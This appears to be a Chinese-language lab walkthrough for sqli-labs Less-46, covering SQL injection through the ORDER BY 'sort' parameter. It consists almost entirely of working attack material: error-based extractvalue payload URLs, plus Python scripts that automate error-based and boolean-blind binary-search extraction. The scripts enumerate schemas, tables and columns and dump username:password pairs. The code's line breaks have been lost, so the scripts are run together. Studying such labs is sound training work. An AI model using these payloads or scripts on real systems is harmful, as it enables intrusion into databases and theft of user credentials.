目录
报错注入
直接注入
数据库名
数据库中的表名
users表结构:
users表数据:
python脚本注入
直接注入
获取数据库名
获取表名
获取表结构
获取数据
布尔盲注
获取数据库名
获取表名
获取表结构
获取数据
报错注入
直接注入
数据库名
当前数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 1,1))))
系统数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))
长度限制,使用截取函数substr():
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))
数据库中的表名
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))
同理使用截取函数substr():
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))
users表结构:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))
users表数据:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))
python脚本注入
直接注入
获取数据库名
import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_database_names():database_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:db_name = match.group(1)database_names.append(db_name)print(f"成功提取数据库名: {db_name}")index += 1elif index == 0:print("找到数据库名,可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有数据库名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误,索引为 {index}: {e}")return database_namesif __name__ == "__main__":all_database_names = extract_database_names()
获取表名
import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_table_names(database_name):table_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:table_name = match.group(1)table_names.append(table_name)print(f"成功提取表名: {table_name}")index += 1elif index == 0:print("找到表名,可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有表名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误,索引为 {index}: {e}")return table_namesif __name__ == "__main__":database_name = "security" # 目标数据库名all_table_names = extract_table_names(database_name)
获取表结构
import requests
import retarget_url = "http://sqli-labs:8013/Less-46/"def extract_column_names(database_name, table_name):column_names = []index = 0while True:payload = {"sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"}try:response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()match = re.search(r"XPATH syntax error: '~([^']+)", response.text)if match:column_name = match.group(1)column_names.append(column_name)print(f"成功提取列名: {column_name}")index += 1elif index == 0:print("找到列名,可能漏洞不存在或错误信息被隐藏")breakelse:print("已提取所有列名")breakexcept (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误,索引为 {index}: {e}")return column_namesif __name__ == "__main__":database_name = "security" # 目标数据库名table_name = "users" # 目标表名all_column_names = extract_column_names(database_name, table_name)
获取数据
import requests
import retarget_url="http://sqli-labs:8013/Less-46/"def extract_user_data(database_name, table_name, record_id):# 提取 username 和 password 的数据data={}# 获取 usernamepayload_username={"sort": f"(extractvalue(1,concat(0x7e,(select username from {table_name} where id={record_id} limit 0,1))))"}# 获取 passwordpayload_password={"sort": f"(extractvalue(1,concat(0x7e,(select password from {table_name} where id={record_id} limit 0,1))))"}try:response_username=requests.get(target_url, params=payload_username, timeout=10)response_username.raise_for_status()match_username=re.search(r"XPATH syntax error: '~([^']+)", response_username.text)response_password=requests.get(target_url, params=payload_password, timeout=10)response_password.raise_for_status()match_password=re.search(r"XPATH syntax error: '~([^']+)", response_password.text)if match_username and match_password:username=match_username.group(1)password=match_password.group(1)data={'username': username, 'password': password}print(f"{username}:{password}")except (requests.exceptions.Timeout, requests.exceptions.HTTPError, requests.exceptions.RequestException) as e:print(f"[-] 请求错误,id={record_id}: {e}")return dataif __name__ == "__main__":database_name="security" # 目标数据库名table_name="users" # 目标表名record_id=1 # 从 id=1 开始while True:print(f"正在提取 id={record_id} 的数据...")user_data=extract_user_data(database_name, table_name, record_id)if not user_data: # 如果没有提取到数据,则跳出循环print("没有更多数据,提取结束。")breakrecord_id+=1 # 继续下一个 id
布尔盲注
获取数据库名
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取数据库名
def get_database_name():database_name = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakdatabase_name += chr(mid)i += 1print(f"Database Name: {database_name}")if __name__ == '__main__':get_database_name()
获取表名
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取表名
def get_table_names():tables = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from \information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breaktables += chr(mid)i += 1print(f"Tables: {tables}")if __name__ == '__main__':get_table_names()
获取表结构
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取列名
def get_column_names():columns = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from \information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakcolumns += chr(mid)i += 1print(f"Columns in 'users': {columns}")if __name__ == '__main__':get_column_names()
获取数据
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 向目标URL发送请求并返回响应
def send_request(url):try:resp = requests.get(url)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 获取数据(如用户名:密码)
def get_user_data():user_data = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) \from users),{i},1))>{mid},id,username) -- "resp = send_request(url)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakuser_data += chr(mid)i += 1print(f"User Data (username:password): {user_data}")if __name__ == '__main__':get_user_data()
